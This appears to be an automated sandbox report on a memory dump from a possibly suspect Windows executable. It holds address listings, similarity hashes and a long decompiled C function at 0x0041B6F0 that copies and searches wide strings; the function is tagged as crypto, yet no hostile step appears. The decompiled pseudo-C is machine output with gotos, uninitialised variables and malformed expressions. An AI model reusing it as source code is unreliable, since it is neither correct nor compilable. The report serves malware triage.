0x0041b1ae
0x0041b1ae
0x0041b1af
0x0041b1b4
0x0041b1b9
0x0041b1bb
0x00000000
0x00000000
0x0041b1bd
0x0041b1c1
0x0041b1c5
0x0041b1c7
0x00000000
0x00000000
0x00000000
0x0041b1c7
0x0041b1ae
0x0041b1aa
0x0041b1c9
0x0041b1c9
0x0041b1cb
0x0041b1cc
0x0041b1d1
0x0041b1d1
0x0041b425
0x0041b425
0x0041b428
0x0041b42a
0x0041b42a
0x00000000
0x0041b17a
0x0041b5bc
0x0041b5bc
0x00000000
0x0041b5bc
0x00000000
0x00000000
0x00000000
0x0041b066
0x0041b431
0x0041b431
0x0041b433
0x0041b437
0x0041b441
0x0041b445
0x0041b455
0x00000000

Strings

@, xrefs: 0041AEF0

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8b23dda31ef708b485797a559140a73a4bae187a5af7111d082972d0fb887ed3
Instruction ID: 304abf2a2867ddcf12f513b88a392600a7f972572e95a596ac600ee2af1100a1
Opcode Fuzzy Hash: 8b23dda31ef708b485797a559140a73a4bae187a5af7111d082972d0fb887ed3
Instruction Fuzzy Hash: BB42F671A047128BC7148F29C4902BB73E2FFD9710F19866EE9959B395E738DC91C38A

Uniqueness

Uniqueness Score: -1.00%

Function 0041B6F0, Relevance: 2.0, Strings: 1, Instructions: 704
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E0041B6F0(signed int __ecx, void* __eflags, signed int* _a4, signed int _a8) {
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed short* _t217;
				unsigned int _t225;
				signed int _t226;
				signed short** _t231;
				signed short* _t235;
				signed int* _t237;
				signed int _t242;
				signed int _t246;
				signed int _t254;
				signed int _t257;
				signed int _t259;
				signed int _t261;
				signed int _t262;
				intOrPtr* _t263;
				signed int _t266;
				signed int _t269;
				unsigned int _t275;
				signed int _t276;
				void* _t282;
				signed int _t285;
				signed int _t286;
				signed int _t290;
				signed int _t291;
				signed int _t293;
				signed int _t300;
				signed int _t301;
				signed int _t306;
				signed int _t307;
				signed int _t310;
				signed int _t319;
				signed int _t321;
				signed int _t335;
				signed int _t338;
				signed int _t339;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t355;
				void* _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				void* _t368;
				signed int _t369;
				signed int _t370;
				signed int _t373;
				intOrPtr* _t375;
				signed int _t376;
				signed int _t377;
				signed int _t378;
				intOrPtr* _t379;
				signed int _t380;
				signed int _t381;
				signed int _t383;
				unsigned int _t385;
				unsigned int _t386;
				unsigned int _t389;
				signed int _t390;
				signed int _t397;
				signed int _t400;
				signed int _t401;
				void* _t402;
				signed int _t403;
				signed int _t404;
				signed int _t407;
				signed int* _t408;
				signed int _t409;
				signed int _t413;
				signed int _t422;
				signed int _t424;
				signed short* _t425;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t438;
				signed int _t444;
				signed int _t446;
				signed int _t448;
				signed int _t451;
				signed int _t452;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				void* _t461;

				_v52 = 0;
				_t438 = __ecx;
				_v48 = 0;
				_push(0x80);
				_t422 = E00411030();
				_t461 = (_t458 & 0xfffffff0) - 0x34 + 4;
				_t217 = _v52;
				if(_t217 == 0) {
					__eflags = 0;
					 *_t422 = 0;
					L8:
					_v48 = 0x40;
					_v52 = _t422;
					if((_a8 & 0x0000ffff) != 0) {
						__eflags = _t422;
						if(_t422 == 0) {
							_t338 = 0x40;
							_t300 = 0;
							L23:
							_t24 = _t300 + 2; // -2147483652
							_t368 = _t24;
							__eflags = _t368 - 0x40;
							_t369 =  <=  ? 0x40 : _t368;
							__eflags = _t338 - _t369;
							if(_t338 < _t369) {
								_t225 = (_t369 >> 5 >> 0x1a) + _t369 >> 6;
								_t370 = _t369 & 0x8000003f;
								__eflags = _t370;
								if(_t370 < 0) {
									_t370 = (_t370 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t370;
								}
								__eflags = _t370;
								_t226 = _t225 + (0 | _t370 > 0x00000000);
								_push(_t226 << 7);
								_t424 = _t226 << 6;
								_t373 = E00411030();
								_t461 = _t461 + 4;
								_t339 = _v52;
								__eflags = _t339;
								if(_t339 == 0) {
									__eflags = 0;
									 *_t373 = 0;
									goto L36;
								} else {
									__eflags = _t373;
									if(_t373 == 0) {
										L34:
										_push(2);
										_push(_t339);
										_v68 = _t373;
										E004110B0();
										_t373 = _v68;
										_t461 = _t461 + 8;
										L36:
										_v48 = _t424;
										_v52 = _t373;
										L37:
										 *((short*)(_t373 + _t300 * 2)) = _a8 & 0x0000ffff;
										__eflags = 0;
										_t231 =  &_v52;
										 *((short*)(_v52 + 2 + _t300 * 2)) = 0;
										L38:
										_t425 =  *_t231;
										if(_t425 == 0) {
											L40:
											_t375 = _a4;
											_push(0x80);
											 *_t375 = 0;
											 *((intOrPtr*)(_t375 + 4)) = 0;
											_t301 = E00411030();
											_t461 = _t461 + 4;
											_t235 =  *_a4;
											if(_t235 == 0) {
												 *_t301 = 0;
												L61:
												_t237 = _a4;
												 *_t237 = _t301;
												_t237[1] = 0x40;
												L62:
												_push(2);
												_push(_v52);
												E004110B0();
												_v52 = 0;
												_v48 = 0;
												return _a4;
											}
											if(_t301 == 0) {
												L46:
												_push(2);
												_push(_t235);
												E004110B0();
												_t461 = _t461 + 8;
												goto L61;
											}
											_t376 =  *_t235 & 0x0000ffff;
											 *_t301 = _t376;
											if(_t376 == 0) {
												goto L46;
											}
											_t377 = 0;
											while(1) {
												_t377 = _t377 + 1;
												_t341 =  *(_t235 + _t377 * 4 - 2) & 0x0000ffff;
												 *(_t301 + _t377 * 4 - 2) = _t341;
												if(_t341 == 0) {
													goto L46;
												}
												_t342 =  *(_t235 + _t377 * 4) & 0x0000ffff;
												 *(_t301 + _t377 * 4) = _t342;
												if(_t342 != 0) {
													continue;
												}
												goto L46;
											}
											goto L46;
										}
										_t378 =  *_t425 & 0x0000ffff;
										if(_t378 != 0) {
											_t242 =  *_t438;
											__eflags = _t242;
											if(_t242 == 0) {
												L53:
												_t379 = _a4;
												_push(0x80);
												 *_t379 = 0;
												 *((intOrPtr*)(_t379 + 4)) = 0;
												_t301 = E00411030();
												_t461 = _t461 + 4;
												_t246 =  *_a4;
												__eflags = _t246;
												if(_t246 == 0) {
													__eflags = 0;
													 *_t301 = 0;
													goto L61;
												}
												__eflags = _t301;
												if(_t301 == 0) {
													L59:
													_push(2);
													_push(_t246);
													E004110B0();
													_t461 = _t461 + 8;
													goto L61;
												}
												_t380 =  *_t246 & 0x0000ffff;
												 *_t301 = _t380;
												__eflags = _t380;
												if(_t380 == 0) {
													goto L59;
												}
												_t381 = 0;
												__eflags = 0;
												while(1) {
													_t381 = _t381 + 1;
													_t343 =  *(_t246 + _t381 * 4 - 2) & 0x0000ffff;
													 *(_t301 + _t381 * 4 - 2) = _t343;
													__eflags = _t343;
													if(_t343 == 0) {
														goto L59;
													}
													_t344 =  *(_t246 + _t381 * 4) & 0x0000ffff;
													 *(_t301 + _t381 * 4) = _t344;
													__eflags = _t344;
													if(_t344 != 0) {
														continue;
													}
													goto L59;
												}
												goto L59;
											}
											__eflags =  *_t242 & 0x0000ffff;
											if(( *_t242 & 0x0000ffff) == 0) {
												goto L53;
											}
											_v36 = _t425;
											_t65 = _t378 - 0x41; // -65
											__eflags = _t65 - 0x19;
											_t66 = _t378 + 0x20; // 0x20
											_t382 =  <=  ? _t66 : _t378;
											_t347 = 0;
											__eflags = 0;
											_t383 = ( <=  ? _t66 : _t378) & 0x0000ffff;
											_v56 = _t383;
											while(1) {
												_t427 =  *(_t242 + _t347 * 2) & 0x0000ffff;
												_t70 = _t427 - 0x41; // 0x7fffffc0
												__eflags = _t70 - 0x19;
												_t71 = _t427 + 0x20; // 0x80000021
												_t428 =  <=  ? _t71 :  *(_t242 + _t347 * 2) & 0x0000ffff;
												__eflags = ( <=  ? _t71 :  *(_t242 + _t347 * 2) & 0x0000ffff) - _t383;
												if(( <=  ? _t71 :  *(_t242 + _t347 * 2) & 0x0000ffff) == _t383) {
													break;
												}
												_t347 = _t347 + 1;
												__eflags =  *(_t242 + _t347 * 2) & 0x0000ffff;
												if(( *(_t242 + _t347 * 2) & 0x0000ffff) != 0) {
													continue;
												}
												goto L53;
											}
											_t429 = _v36;
											_t348 = _t242 + _t347 * 2;
											__eflags = _t348;
											if(_t348 == 0) {
												goto L53;
											}
											_t306 = _t429 & 0x0000000f;
											asm("pxor xmm0, xmm0");
											_t385 = _t306 & 0x00000001;
											_t444 =  ~_t306 + 0x10 >> 1;
											_v32 = _t242;
											_v36 = _t429;
											while(1) {
												L69:
												_t430 = _t306;
												__eflags = _t306;
												if(_t306 == 0) {
													goto L75;
												}
												_t257 = 0;
												__eflags = _t385;
												if(_t385 != 0) {
													L79:
													_v40 = _t348;
													_t436 = _v36;
													while(1) {
														__eflags =  *(_t436 + _t257 * 2) & 0x0000ffff;
														if(( *(_t436 + _t257 * 2) & 0x0000ffff) == 0) {
															break;
														}
														_t257 = _t257 + 1;
														__eflags = _t257 - 0x7fffffff;
														if(_t257 < 0x7fffffff) {
															continue;
														}
														_v36 = _t436;
														_t350 = _v40;
														L83:
														_t257 = 0x7fffffff;
														L84:
														_v60 = _t257;
														_t431 = 0;
														__eflags = 0;
														_v68 = _t306;
														_v64 = _t444;
														_v44 = _t386;
														while(1) {
															_t307 =  *(_t350 + _t431 * 2) & 0x0000ffff;
															_t446 =  *(_v36 + _t431 * 2) & 0x0000ffff;
															__eflags = _t307 - 0x61 - 0x19;
															_t308 =  <=  ? _t307 - 0x20 : _t307;
															_t259 = ( <=  ? _t307 - 0x20 : _t307) & 0x0000ffff;
															__eflags = _t446 - 0x61 - 0x19;
															_t447 =  <=  ? _t446 - 0x20 : _t446;
															__eflags = _t259 - ( <=  ? _t446 - 0x20 : _t446);
															if(__eflags < 0 || __eflags > 0) {
																break;
															}
															__eflags = _t259;
															if(_t259 == 0) {
																L89:
																_t306 = _v68;
																_t444 = _v64;
																_t385 = _v44;
																_t262 = _v32;
																_t434 = _v36;
																L90:
																__eflags = _t350;
																if(_t350 == 0) {
																	goto L53;
																}
																__eflags = _t306;
																if(_t306 == 0) {
																	L97:
																	_t397 =  ~( ~_t306 + 0x00000007 & 0x00000007) + 0x7fffffff;
																	__eflags = _t397;
																	while(1) {
																		asm("movdqu xmm1, [edi+ebx*2]");
																		asm("pcmpeqw xmm1, xmm0");
																		asm("pmovmskb esi, xmm1");
																		__eflags = _t444;
																		if(_t444 != 0) {
																			break;
																		}
																		_t306 = _t306 + 8;
																		__eflags = _t306 - _t397;
																		if(_t306 < _t397) {
																			continue;
																		}
																		__eflags = _t397 - 0x7fffffff;
																		if(_t397 >= 0x7fffffff) {
																			L103:
																			_t397 = 0x7fffffff;
																			L104:
																			_t451 = _t262 & 0x0000000f;
																			__eflags = _t451;
																			if(_t451 == 0) {
																				L109:
																				_t319 =  ~( ~_t451 + 0x00000007 & 0x00000007) + 0x7fffffff;
																				__eflags = _t319;
																				while(1) {
																					asm("movdqu xmm1, [eax+esi*2]");
																					asm("pcmpeqw xmm1, xmm0");
																					asm("pmovmskb edi, xmm1");
																					__eflags = _t434;
																					if(_t434 != 0) {
																						break;
																					}
																					_t451 = _t451 + 8;
																					__eflags = _t451 - _t319;
																					if(_t451 < _t319) {
																						continue;
																					}
																					__eflags = _t319 - 0x7fffffff;
																					if(_t319 >= 0x7fffffff) {
																						L115:
																						_t319 = 0x7fffffff;
																						L116:
																						_t355 = (_t350 - _t262 >> 1) + _t397;
																						__eflags = _t355;
																						_t356 =  <=  ? 0 : _t355;
																						__eflags = _t319 - _t356;
																						_t357 =  <  ? _t319 : _t356;
																						_t321 = _t319 - _t357;
																						_t435 = _t262 + _t357 * 2;
																						_t263 = _a4;
																						 *_t263 = 0;
																						 *((intOrPtr*)(_t263 + 4)) = 0;
																						__eflags = _t435;
																						if(_t435 == 0) {
																							L151:
																							_push(0x80);
																							_t301 = E00411030();
																							_t461 = _t461 + 4;
																							_t266 =  *_a4;
																							__eflags = _t266;
																							if(_t266 == 0) {
																								 *_t301 = 0;
																								goto L61;
																							}
																							__eflags = _t301;
																							if(_t301 == 0) {
																								L157:
																								_push(2);
																								_push(_t266);
																								E004110B0();
																								_t461 = _t461 + 8;
																								goto L61;
																							}
																							_t400 =  *_t266 & 0x0000ffff;
																							 *_t301 = _t400;
																							__eflags = _t400;
																							if(_t400 == 0) {
																								goto L157;
																							}
																							_t401 = 0;
																							__eflags = 0;
																							while(1) {
																								_t401 = _t401 + 1;
																								_t358 =  *(_t266 + _t401 * 4 - 2) & 0x0000ffff;
																								 *(_t301 + _t401 * 4 - 2) = _t358;
																								__eflags = _t358;
																								if(_t358 == 0) {
																									goto L157;
																								}
																								_t359 =  *(_t266 + _t401 * 4) & 0x0000ffff;
																								 *(_t301 + _t401 * 4) = _t359;
																								__eflags = _t359;
																								if(_t359 != 0) {
																									continue;
																								}
																								goto L157;
																							}
																							goto L157;
																						}
																						_t269 =  *_t435 & 0x0000ffff;
																						__eflags = _t269;
																						if(_t269 == 0) {
																							goto L151;
																						}
																						__eflags = _t321;
																						if(_t321 != 0) {
																							L131:
																							_t160 = _t321 + 1; // 0x80000000
																							_t402 = _t160;
																							__eflags = _t402 - 0x40;
																							_t403 =  <=  ? 0x40 : _t402;
																							__eflags = _t403;
																							if(_t403 > 0) {
																								_t275 = (_t403 >> 5 >> 0x1a) + _t403 >> 6;
																								_t404 = _t403 & 0x8000003f;
																								__eflags = _t404;
																								if(_t404 < 0) {
																									_t404 = (_t404 - 0x00000001 | 0xffffffc0) + 1;
																									__eflags = _t404;
																								}
																								__eflags = _t404;
																								_t276 = _t275 + (0 | _t404 > 0x00000000);
																								_v68 = _t276 << 6;
																								_push(_t276 << 7);
																								_t452 = E00411030();
																								_t461 = _t461 + 4;
																								_t407 =  *_a4;
																								__eflags = _t407;
																								if(_t407 == 0) {
																									__eflags = 0;
																									 *_t452 = 0;
																									goto L143;
																								} else {
																									__eflags = _t452;
																									if(_t452 == 0) {
																										L141:
																										_push(2);
																										_push(_t407);
																										E004110B0();
																										_t461 = _t461 + 8;
																										L143:
																										_t408 = _a4;
																										_t408[1] = _v68;
																										 *_t408 = _t452;
																										L144:
																										__eflags = _t452;
																										if(_t452 == 0) {
																											goto L62;
																										}
																										_t282 = 0;
																										while(1) {
																											_t409 =  *_t435 & 0x0000ffff;
																											_t282 = _t282 + 1;
																											 *_t452 = _t409;
																											__eflags = _t321;
																											if(_t321 == 0) {
																												goto L149;
																											}
																											__eflags = _t282 - _t321;
																											if(_t282 == _t321) {
																												 *(_t452 + 2) = 0;
																												goto L62;
																											}
																											L149:
																											__eflags = _t409;
																											if(_t409 == 0) {
																												goto L62;
																											}
																											_t452 = _t452 + 2;
																											_t435 = _t435 + 2;
																											__eflags = _t435;
																										}
																									}
																									_t285 =  *_t407 & 0x0000ffff;
																									 *_t452 = _t285;
																									__eflags = _t285;
																									if(_t285 == 0) {
																										goto L141;
																									}
																									_t286 = 0;
																									__eflags = 0;
																									while(1) {
																										_t286 = _t286 + 1;
																										_t362 =  *(_t407 + _t286 * 4 - 2) & 0x0000ffff;
																										 *(_t452 + _t286 * 4 - 2) = _t362;
																										__eflags = _t362;
																										if(_t362 == 0) {
																											goto L141;
																										}
																										_t363 =  *(_t407 + _t286 * 4) & 0x0000ffff;
																										 *(_t452 + _t286 * 4) = _t363;
																										__eflags = _t363;
																										if(_t363 != 0) {
																											continue;
																										}
																										goto L141;
																									}
																									goto L141;
																								}
																							}
																							_t452 = 0;
																							goto L144;
																						}
																						_t413 = _t435 & 0x0000000f;
																						__eflags = _t413;
																						if(_t413 == 0) {
																							L124:
																							_t321 =  ~( ~_t413 + 0x00000007 & 0x00000007) + 0x7fffffff;
																							__eflags = _t321;
																							while(1) {
																								asm("movdqu xmm1, [edi+edx*2]");
																								asm("pcmpeqw xmm1, xmm0");
																								asm("pmovmskb eax, xmm1");
																								__eflags = _t269;
																								if(_t269 != 0) {
																									break;
																								}
																								_t413 = _t413 + 8;
																								__eflags = _t413 - _t321;
																								if(_t413 < _t321) {
																									continue;
																								}
																								__eflags = _t321 - 0x7fffffff;
																								if(_t321 >= 0x7fffffff) {
																									L130:
																									_t321 = 0x7fffffff;
																									goto L131;
																								} else {
																									goto L128;
																								}
																								while(1) {
																									L128:
																									__eflags =  *(_t435 + _t321 * 2) & 0x0000ffff;
																									if(( *(_t435 + _t321 * 2) & 0x0000ffff) == 0) {
																										goto L131;
																									}
																									_t321 = _t321 + 1;
																									__eflags = _t321 - 0x7fffffff;
																									if(_t321 < 0x7fffffff) {
																										continue;
																									}
																									goto L130;
																								}
																								goto L131;
																							}
																							asm("bsf ebx, eax");
																							_t321 = (_t321 >> 1) + _t413;
																							goto L131;
																						}
																						_t321 = 0;
																						__eflags = _t413 & 0x00000001;
																						if((_t413 & 0x00000001) != 0) {
																							goto L128;
																						}
																						_t413 =  ~_t413 + 0x10 >> 1;
																						__eflags = _t413;
																						while(1) {
																							_t269 =  *(_t435 + _t321 * 2) & 0x0000ffff;
																							__eflags = _t269;
																							if(_t269 == 0) {
																								goto L131;
																							}
																							_t321 = _t321 + 1;
																							__eflags = _t321 - _t413;
																							if(_t321 < _t413) {
																								continue;
																							}
																							goto L124;
																						}
																						goto L131;
																					} else {
																						goto L113;
																					}
																					while(1) {
																						L113:
																						__eflags =  *(_t262 + _t319 * 2) & 0x0000ffff;
																						if(( *(_t262 + _t319 * 2) & 0x0000ffff) == 0) {
																							goto L116;
																						}
																						_t319 = _t319 + 1;
																						__eflags = _t319 - 0x7fffffff;
																						if(_t319 < 0x7fffffff) {
																							continue;
																						}
																						goto L115;
																					}
																					goto L116;
																				}
																				asm("bsf ebx, edi");
																				_t319 = (_t319 >> 1) + _t451;
																				goto L116;
																			}
																			_t319 = 0;
																			__eflags = _t451 & 0x00000001;
																			if((_t451 & 0x00000001) != 0) {
																				goto L113;
																			}
																			_t451 =  ~_t451 + 0x10 >> 1;
																			__eflags = _t451;
																			while(1) {
																				_t434 =  *(_t262 + _t319 * 2) & 0x0000ffff;
																				__eflags = _t434;
																				if(_t434 == 0) {
																					goto L116;
																				}
																				_t319 = _t319 + 1;
																				__eflags = _t319 - _t451;
																				if(_t319 < _t451) {
																					continue;
																				}
																				goto L109;
																			}
																			goto L116;
																		} else {
																			goto L101;
																		}
																		while(1) {
																			L101:
																			__eflags =  *(_t434 + _t397 * 2) & 0x0000ffff;
																			if(( *(_t434 + _t397 * 2) & 0x0000ffff) == 0) {
																				goto L104;
																			}
																			_t397 = _t397 + 1;
																			__eflags = _t397 - 0x7fffffff;
																			if(_t397 < 0x7fffffff) {
																				continue;
																			}
																			goto L103;
																		}
																		goto L104;
																	}
																	asm("bsf edx, esi");
																	_t397 = (_t397 >> 1) + _t306;
																	goto L104;
																}
																__eflags = _t385;
																_t397 = 0;
																if(_t385 != 0) {
																	goto L101;
																}
																_v32 = _t262;
																_t306 = _t444;
																while(1) {
																	__eflags =  *(_t434 + _t397 * 2) & 0x0000ffff;
																	if(( *(_t434 + _t397 * 2) & 0x0000ffff) == 0) {
																		break;
																	}
																	_t397 = _t397 + 1;
																	__eflags = _t397 - _t444;
																	if(_t397 < _t444) {
																		continue;
																	}
																	_t262 = _v32;
																	goto L97;
																}
																_t262 = _v32;
																goto L104;
															}
															_t431 = _t431 + 1;
															__eflags = _t431 - _v60;
															if(_t431 < _v60) {
																continue;
															}
															goto L89;
														}
														_t310 = _v68;
														_t448 = _v64;
														_t389 = _v44;
														_t433 = _t350 + 2;
														__eflags = _t433;
														if(_t433 == 0) {
															goto L53;
														}
														__eflags =  *(_t350 + 2) & 0x0000ffff;
														if(( *(_t350 + 2) & 0x0000ffff) == 0) {
															goto L53;
														}
														_v68 = _t310;
														_t261 = 0;
														__eflags = 0;
														_v64 = _t448;
														_v44 = _t389;
														_v40 = _t350;
														while(1) {
															_t261 = _t261 + 1;
															_t348 = _v40 + _t261 * 2;
															_t390 =  *_t348 & 0x0000ffff;
															__eflags = ( *(_t433 + _t261 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
															_t391 =  <=  ? _t390 + 0x20 : _t390;
															__eflags = ( <=  ? _t390 + 0x20 : _t390) - _v56;
															if(( <=  ? _t390 + 0x20 : _t390) == _v56) {
																break;
															}
															__eflags =  *(_t433 + _t261 * 2) & 0x0000ffff;
															if(( *(_t433 + _t261 * 2) & 0x0000ffff) != 0) {
																continue;
															}
															goto L53;
														}
														_t306 = _v68;
														_t444 = _v64;
														_t385 = _v44;
														goto L69;
													}
													_v36 = _t436;
													_t350 = _v40;
													L162:
													__eflags = _t257;
													if(__eflags == 0) {
														goto L83;
													}
													if(__eflags > 0) {
														goto L84;
													}
													_t262 = _v32;
													_t434 = _v36;
													goto L90;
												}
												_v40 = _t348;
												_t430 = _t444;
												_v44 = _t385;
												_t364 = _v36;
												while(1) {
													__eflags =  *(_t364 + _t257 * 2) & 0x0000ffff;
													if(( *(_t364 + _t257 * 2) & 0x0000ffff) == 0) {
														break;
													}
													_t257 = _t257 + 1;
													__eflags = _t257 - _t444;
													if(_t257 < _t444) {
														continue;
													}
													_v36 = _t364;
													_t385 = _v44;
													_t348 = _v40;
													goto L75;
												}
												_v36 = _t364;
												_t386 = _v44;
												_t350 = _v40;
												goto L162;
												L75:
												_v40 = _t348;
												_t254 =  ~( ~_t430 + 0x00000007 & 0x00000007) + 0x7fffffff;
												__eflags = _t254;
												_v44 = _t385;
												_t349 = _v36;
												while(1) {
													asm("movdqu xmm1, [ecx+edi*2]");
													asm("pcmpeqw xmm1, xmm0");
													asm("pmovmskb edx, xmm1");
													__eflags = _t385;
													if(_t385 != 0) {
														break;
													}
													_t430 = _t430 + 8;
													__eflags = _t430 - _t254;
													if(_t430 < _t254) {
														continue;
													}
													_v36 = _t349;
													_t386 = _v44;
													_t350 = _v40;
													__eflags = _t254 - 0x7fffffff;
													if(_t254 >= 0x7fffffff) {
														goto L83;
													}
													goto L79;
												}
												asm("bsf eax, eax");
												_v36 = _t349;
												_t257 = (_t385 >> 1) + _t430;
												_t386 = _v44;
												_t350 = _v40;
												goto L162;
											}
										}
										goto L40;
									}
									_t290 =  *_t339 & 0x0000ffff;
									 *_t373 = _t290;
									__eflags = _t290;
									if(_t290 == 0) {
										goto L34;
									}
									_v68 = _t438;
									_t291 = 0;
									__eflags = 0;
									while(1) {
										_t291 = _t291 + 1;
										_t456 =  *(_t339 + _t291 * 4 - 2) & 0x0000ffff;
										 *(_t373 + _t291 * 4 - 2) = _t456;
										__eflags = _t456;
										if(_t456 == 0) {
											break;
										}
										_t457 =  *(_t339 + _t291 * 4) & 0x0000ffff;
										 *(_t373 + _t291 * 4) = _t457;
										__eflags = _t457;
										if(_t457 != 0) {
											continue;
										}
										break;
									}
									_t438 = _v68;
									goto L34;
								}
							}
							_t373 = _v52;
							goto L37;
						}
						_t293 = _t422 & 0x0000000f;
						__eflags = _t293;
						if(_t293 == 0) {
							L16:
							asm("pxor xmm0, xmm0");
							_t335 =  ~( ~_t293 + 0x00000007 & 0x00000007) + 0x7fffffff;
							__eflags = _t335;
							while(1) {
								asm("movdqu xmm1, [edi+eax*2]");
								asm("pcmpeqw xmm1, xmm0");
								asm("pmovmskb edx, xmm1");
								__eflags = _t367;
								if(_t367 != 0) {
									break;
								}
								_t293 = _t293 + 8;
								__eflags = _t293 - _t335;
								if(_t293 < _t335) {
									continue;
								}
								__eflags = _t335 - 0x7fffffff;
								if(_t335 >= 0x7fffffff) {
									L22:
									_t338 = 0x40;
									_t300 = 0x7fffffff;
									goto L23;
								} else {
									goto L20;
								}
								while(1) {
									L20:
									__eflags =  *(_t422 + _t335 * 2) & 0x0000ffff;
									if(( *(_t422 + _t335 * 2) & 0x0000ffff) == 0) {
										break;
									}
									_t335 = _t335 + 1;
									__eflags = _t335 - 0x7fffffff;
									if(_t335 < 0x7fffffff) {
										continue;
									}
									goto L22;
								}
								L63:
								__eflags = _t300 - 0xfffffffe;
								if(_t300 != 0xfffffffe) {
									_t338 = 0x40;
								} else {
									 *_t422 = 0;
									_t338 = _v48;
								}
								goto L23;
							}
							asm("bsf ebx, edx");
							_t300 = (_t335 >> 1) + _t293;
							goto L63;
						}
						_t335 = 0;
						__eflags = _t293 & 0x00000001;
						if((_t293 & 0x00000001) != 0) {
							goto L20;
						}
						_t293 =  ~_t293 + 0x10 >> 1;
						__eflags = _t293;
						while(1) {
							_t367 =  *(_t422 + _t335 * 2) & 0x0000ffff;
							__eflags = _t367;
							if(_t367 == 0) {
								goto L63;
							}
							_t335 = _t335 + 1;
							__eflags = _t335 - _t293;
							if(_t335 < _t293) {
								continue;
							}
							goto L16;
						}
						goto L63;
					}
					_t231 =  &_v52;
					goto L38;
				}
				if(_t422 == 0) {
					L6:
					_push(2);
					_push(_t217);
					E004110B0();
					_t461 = _t461 + 8;
					goto L8;
				}
				_t367 =  *_t217 & 0x0000ffff;
				 *_t422 = _t367;
				if(_t367 == 0) {
					goto L6;
				}
				while(1) {
					_t367 = 1;
					_t365 = _t217[1] & 0x0000ffff;
					 *(_t422 + 2) = _t365;
					if(_t365 == 0) {
						goto L6;
					}
					_t366 = _t217[2] & 0x0000ffff;
					 *(_t422 + 4) = _t366;
					if(_t366 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x0041b6fe
0x0041b702
0x0041b704
0x0041b708
0x0041b712
0x0041b714
0x0041b717
0x0041b71d
0x0041b757
0x0041b759
0x0041b75c
0x0041b760
0x0041b768
0x0041b76e
0x0041b779
0x0041b77b
0x0041bf3a
0x0041bf3f
0x0041b7ff
0x0041b804
0x0041b804
0x0041b807
0x0041b80a
0x0041b80d
0x0041b80f
0x0041b824
0x0041b827
0x0041b827
0x0041b82d
0x0041b835
0x0041b835
0x0041b835
0x0041b836
0x0041b840
0x0041b847
0x0041b848
0x0041b850
0x0041b852
0x0041b855
0x0041b859
0x0041b85b
0x0041b8a3
0x0041b8a5
0x00000000
0x0041b85d
0x0041b85d
0x0041b85f
0x0041b88e
0x0041b88e
0x0041b890
0x0041b891
0x0041b895
0x0041b89a
0x0041b89e
0x0041b8a8
0x0041b8a8
0x0041b8ac
0x0041b8b0
0x0041b8b4
0x0041b8b8
0x0041b8be
0x0041b8c2
0x0041b8c7
0x0041b8c7
0x0041b8cb
0x0041b8d4
0x0041b8d4
0x0041b8d9
0x0041b8de
0x0041b8e0
0x0041b8e8
0x0041b8ea
0x0041b8f0
0x0041b8f4
0x0041b933
0x0041b9e2
0x0041b9e2
0x0041b9e5
0x0041b9e7
0x0041b9ee
0x0041b9ee
0x0041b9f0
0x0041b9f4
0x0041b9fe
0x0041ba02
0x0041ba12
0x0041ba12
0x0041b8f8
0x0041b921
0x0041b921
0x0041b923
0x0041b924
0x0041b929
0x00000000
0x0041b929
0x0041b8fa
0x0041b8fd
0x0041b902
0x00000000
0x00000000
0x0041b904
0x0041b906
0x0041b906
0x0041b907
0x0041b90c
0x0041b913
0x00000000
0x00000000
0x0041b915
0x0041b919
0x0041b91f
0x00000000
0x00000000
0x00000000
0x0041b91f
0x00000000
0x0041b906
0x0041b8cd
0x0041b8d2
0x0041b93b
0x0041b93d
0x0041b93f
0x0041b983
0x0041b983
0x0041b988
0x0041b98d
0x0041b98f
0x0041b997
0x0041b999
0x0041b99f
0x0041b9a1
0x0041b9a3
0x0041b9dd
0x0041b9df
0x00000000
0x0041b9df
0x0041b9a5
0x0041b9a7
0x0041b9d0
0x0041b9d0
0x0041b9d2
0x0041b9d3
0x0041b9d8
0x00000000
0x0041b9d8
0x0041b9a9
0x0041b9ac
0x0041b9af
0x0041b9b1
0x00000000
0x00000000
0x0041b9b3
0x0041b9b3
0x0041b9b5
0x0041b9b5
0x0041b9b6
0x0041b9bb
0x0041b9c0
0x0041b9c2
0x00000000
0x00000000
0x0041b9c4
0x0041b9c8
0x0041b9cc
0x0041b9ce
0x00000000
0x00000000
0x00000000
0x0041b9ce
0x00000000
0x0041b9b5
0x0041b944
0x0041b946
0x00000000
0x00000000
0x0041b948
0x0041b94c
0x0041b94f
0x0041b952
0x0041b955
0x0041b958
0x0041b958
0x0041b95a
0x0041b95d
0x0041b961
0x0041b961
0x0041b965
0x0041b968
0x0041b96b
0x0041b96e
0x0041b971
0x0041b974
0x00000000
0x00000000
0x0041b97a
0x0041b97f
0x0041b981
0x00000000
0x00000000
0x00000000
0x0041b981
0x0041ba32
0x0041ba36
0x0041ba39
0x0041ba3b
0x00000000
0x00000000
0x0041ba43
0x0041ba46
0x0041ba50
0x0041ba56
0x0041ba58
0x0041ba5c
0x0041ba6d
0x0041ba6d
0x0041ba6d
0x0041ba6f
0x0041ba71
0x00000000
0x00000000
0x0041ba73
0x0041ba75
0x0041ba77
0x0041baf0
0x0041baf0
0x0041baf4
0x0041baf8
0x0041bafc
0x0041bafe
0x00000000
0x00000000
0x0041bb04
0x0041bb05
0x0041bb0a
0x00000000
0x00000000
0x0041bb0c
0x0041bb10
0x0041bb14
0x0041bb14
0x0041bb19
0x0041bb19
0x0041bb1d
0x0041bb1d
0x0041bb1f
0x0041bb22
